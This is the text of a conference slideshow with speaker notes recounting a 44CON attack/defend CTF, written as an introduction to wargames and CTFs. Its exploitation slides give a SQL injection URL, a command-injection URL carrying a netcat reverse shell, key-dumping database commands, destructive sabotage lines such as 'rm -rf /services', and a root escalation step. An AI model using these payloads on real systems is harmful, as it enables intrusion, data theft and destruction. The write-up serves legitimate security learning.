Successfully reported this slideshow.
Your SlideShare is downloading. ×

Playing CTFs for Fun & Profit

Loading in …3

Check these out next

1 of 119 Ad

More Related Content

Slideshows for you (19)

Similar to Playing CTFs for Fun & Profit (20)


Recently uploaded (20)

Playing CTFs for Fun & Profit

  1. 1. Playing CTFs for Fun & Profit
  2. 2. Me @impdefined Software developer Know a lot about bugs Trying not to make things worse
  3. 3. Me Playing CTFs for ~2 years CTF team 0xbadf00d Contributor to
  4. 4. You
  5. 5. Wargames & CTFs
  6. 6. Wargames & CTFs – Why? Learning Hands-on experience Legal Fun! (and profit)
  7. 7. Wargames & CTFs – Why?
  8. 8. Wargames
  9. 9. Wargames
  10. 10. Wargames Technical security exercises
  11. 11. Wargames Technical security exercises Hacking challenges
  12. 12. Wargames Technical security exercises Hacking challenges Progress through series of levels No time limits Solo
  13. 13. Wargames - categories Web Binary exploitation Cryptography General design flaws
  14. 14. Wargames - examples
  15. 15. Loaded 1 password hash (FreeBSD MD5 [32/32]) ******* (administrator) guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********
  16. 16. Wargames - experience
  17. 17. Playing wargames I got to: Implement a padding oracle attack against RSA Despair at the state of PHP Implement a CPU timing attack Exploit a kernel stack buffer overflow Create a JS VM for a custom processor architecture Write lots of custom shellcode XOR all the things
  18. 18. Capture the Flag
  19. 19. Capture the Flag Time-limited event to test your skills Team-based Competitive Not “progressive”
  20. 20. CTF types Challenge-based DEF CON quals Ghost In The Shellcode CSAW CTF Attack/defend DEF CON finals 44Con CTF 2012
  21. 21. CTF types Lots of online events ~20 last year mainly challenge-based Live events! 44CON: Lewt RuCTFE: £3,000 Codegate: £11,000
  22. 22. Playing CTF
  23. 23. Capture the flag experience
  24. 24. Capture the flag experience
  25. 25. CTF challenge - jacked
  26. 26. CTF challenge - jacked # nc 2121 Jack's Blackjack Simulator Blackjack pays 2:1 Dealer must hit soft 17 Single deck, shuffled after every round Enter your name: pwn Your table companions: Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950 You have $1000 Place your bet (zero to exit): $
  27. 27. CTF challenge - jacked $1,000,000,000 will win the game Good random source 32bit seed Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950
  28. 28. CTF challenge - jacked
  29. 29. CTF challenge - Folly Text adventure On winning, enter shellcode Binary is chrooted, make custom code Read “key” file... get another port and binary
  30. 30. CTF challenge - Folly x86_64 x86 ARM ARM Thumb PPC Alpha Cris
  31. 31. CTF challenge - blocky
  32. 32. CTF challenge - blocky
  33. 33. CTF challenge - blocky
  34. 34. CTF challenge - blocky
  35. 35. CTF challenge - blocky
  36. 36. CTF challenge - blocky
  37. 37. CTF challenge - blocky
  38. 38. 44CON CTF 2012
  39. 39. 44CON CTF 2012 Attack & Defend Provided with: Virtual machine IP address Ranges of target machines
  40. 40. Attack & Defend Kind of like a pentest but more fun I have a plan Recon Harden Write exploits Run riot Get the girl
  41. 41. Recon I'd rather be offline than owned Self-recon Capture traffic Quick nmap of non-player servers
  42. 42. Recon - services
  43. 43. Recon - services
  44. 44. Recon - scoring Packet captures shed some light Regular "scoring rounds“ Every 30 minutes Scoring server stores new keys in services and checks for previous keys
  45. 45. Pastie
  46. 46. Pastie
  47. 47. Pastie
  48. 48. Pastie
  49. 49. Pastie Written in PHP Pastes stored in a MySQL database PHP+MySQL Can you tell what the vuln is yet?
  50. 50. Pastie vulnerability Classic SQL injection
  51. 51. Pastie fix It’s not all pwnpwnpwn Updated code with prepared statements PHP 
  52. 52. Pastie exploit I want keys!
  53. 53. Pastie exploit https://ip/view/%'+and+lang+=+'text'+order+by+ date+desc+--+
  54. 54. Pastie exploit
  55. 55. Pastie exploit – scripted
  56. 56. Mailserver
  57. 57. Mailserver SMTP and POP3 server Keys stored in emails Written in Ruby I don’t know Ruby Only ~500 lines
  58. 58. Mailserver - vulnerability This just interprets provided text as ruby code Time to learn Ruby! ???
  59. 59. Mailserver - vulnerability Looking at the logs... Verify vulnerability
  60. 60. Mailserver - exploitation I'm sure Ruby is lovely... ... but let's just find some code to copy
  61. 61. Mailserver - exploitation
  62. 62. Mailserver - exploitation
  63. 63. Mailserver - scripted
  64. 64. Auth
  65. 65. Auth Listening on port 23500
  66. 66. Auth
  67. 67. Auth Redis wrapper Stores arbitrary strings
  68. 68. Auth vulnerability Source analysis 101
  69. 69. Auth vulnerability
  70. 70. Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution...
  71. 71. Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution... ... noooope.
  72. 72. Auth exploitation
  73. 73. Auth exploitation Put a valid writable address in the pointer Easy if this was a 32bit process 64bit, annoying memory space
  74. 74. Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
  75. 75. Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)
  76. 76. Auth exploitation Time’s up! No remote code execution  Very limited DoS Crash process Restarts automatically
  77. 77. Servicemon
  78. 78. Servicemon
  79. 79. Servicemon
  80. 80. Servicemon
  81. 81. Servicemon Command injection via "filelist" parameter
  82. 82. Servicemon - vulnerability filelist=/services/auth/auth %x(shasum /services/auth/auth) filelist=notafile || id %x(shasum notafile || id)
  83. 83. Servicemon - vulnerability
  84. 84. Servicemon - exploitation Never mind keys, I want a shell contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
  85. 85. Servicemon - exploitation Stand back... I know bash* rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp %2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20% 2Ftmp%2Ff%7C%2Fbin%2Fsh%20- i%202>%261%7Cnc%20192.168.1.75%203133 7%20>%2Ftmp%2Ff * totally copied from somewhere
  86. 86. Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon I got a shell! Now I can have some fun!
  87. 87. Rampage
  88. 88. Rampage
  89. 89. Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys * | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
  90. 90. Leave a calling card echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
  91. 91. Annoy echo exit >> ~/.bashrc rm -rf /services echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
  92. 92. Escalation
  93. 93. Escalation Getting keys is fine Getting shells is better Getting root is best
  94. 94. Escalation – the hard way $ find /etc -writable /etc/init/mail.conf /etc/init/auth.conf
  95. 95. Escalation – the hard way USER PID TTY STAT COMMAND root 8680 ? Ss /services/auth/auth
  96. 96. Escalation – the hard way When auth starts we will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500 Connection from port 31337 [tcp/*] accepted # whoami root
  97. 97. Escalation – the easy way 220 Mail Service ready (33147) HELO 250 Requested mail action okay, completed EXPN respond(client, %x(whoami)) root
  98. 98. Playing wargames & CTFs
  99. 99. Useful stuff – general Scripting language Hex editor Linux & Windows VMs The linux “file” command
  100. 100. Useful stuff - web Firefox + Firebug + Tamper data
  101. 101. Useful stuff - binary C Disassembler (IDA demo, Hopper)
  102. 102. Useful stuff - CTF Collaboration! Wiki IRC
  103. 103. Wargame recommendations (Natas) Web exploitation Binary exploitation Web exploitation (Vortex) Binary exploitation (Bandit) "Absolute beginners" (learn how to Linux)
  104. 104. CTF recommendations DEF CON CTF June Binary-heavy CSAW CTF “gentle” introduction September
  105. 105. Motivation 44CON Lewt CSAW £600 HitB AMS £1,500 Plaid £2,500 RuCTFE £3,000 PHdays £6,000 Codegate £11,000
  106. 106. Motivation
  107. 107. Questions @impdefined

Editor's Notes

  • Version 1.2
  • I’ve been playing CTFs for around 2 years now.
  • Who has played a CTF before? How about wargames?
  • Who here has played a CTF before? And how about wargames?
  • Next to look at some wargames sites
  • Pick a link
  • The links show different images. Interesting.
  • Trying to view page source
  • Trying to view the admin directory. What files control basic authentication?
  • I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
  • This is the typical wargames experience.
  • There are lots of wargames around – I have some specific recommendations at the end
  • Often same kinds of challenges as wargames. Lots of exploitation!By “progressive” I mean that you can generally attempt any tasks rather than having to complete “easier” ones first.
  • Challenge-based also called “jeopardy” style
  • After this, let’s look at some CTF scoreboards
  • From these values we can brute-force calculate the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness!Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
  • So when we win, this code is reached. Can anyone see how we’d actually exploit this?
  • Running on port 443, simple web interface.
  • Enter whatever text you want, choose a “language”, hit submit
  • Click to show random text highlighted.Recon shows that the “keys” are entered as pastes and then checked again later.
  • Digging into how pastie works
  • The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
  • Ran mysql against my instance to figure out the query needed to get data out.
  • And that’s the pastie service done 
  • Where to start? Just browsing through piles of incomprehensible ruby.
  • Let’s verify that this does what it looks like it does.No 250 response code, just closes the connection.
  • So how to exploit? I want to get the keys out.
  • It doesn't seem to respond to much
  • I love binary exploitation. I used to think I was ok at it.
  • What does it actually do?
  • Who can name a dangerous C function?
  • Classic SBO, surely this gives remote pre-auth code execution?
  • Nope
  • Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
  • Memory map of auth process
  • When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
  • Now for my l33t exploit. Nope. Out of time.
  • Apache, running on port 3000
  • Found the ruby code being run. It looks like it monitors other services.
  • It can also get hashes of files. Can anyone guess what the exploit is yet?
  • It can also get hashes of files. Can anyone guess what the exploit is yet?
  • Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
  • Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
  • We start a listener
  • Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
  • Last one changes them back to their home directory before each command.
  • We’re hackers. Go root or go home.
  • You've got a shell, now what?They've changed the password, so sudo doesn't work!What can we edit, configuration-wise?
  • Auth runs as root. We can make something else run as root. How about our connect-back code?
  • How do we go about making auth restart? Lame DoS. Root.
  • Just give it a go. Try some wargames. You will get stuck. Persist!For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
  • Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
  • Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though 
  • I like learning, I enjoy it. Some people like money.